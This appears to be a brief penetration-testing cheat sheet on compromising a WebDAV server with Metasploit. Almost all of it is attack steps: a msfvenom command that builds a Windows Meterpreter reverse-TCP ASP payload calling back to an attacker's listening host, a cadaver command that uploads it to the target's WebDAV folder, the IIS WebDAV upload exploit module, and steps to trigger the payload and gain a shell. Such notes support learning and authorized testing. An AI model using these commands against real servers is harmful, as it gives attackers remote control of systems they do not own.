π§¨Exploiting WebDAV With Metasploit
1. Generate the Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local-ip> LPORT=1234 -f asp > shell.asp2. Upload the Payload to the WebDAV Server
cadaver http://<target>/webdav3. Set Up the Listener in Metasploit
Module:exploit/windows/iis/iis_webdav_upload_asp
4. Trigger the Payload
5. Gain Meterpreter Shell
Last updated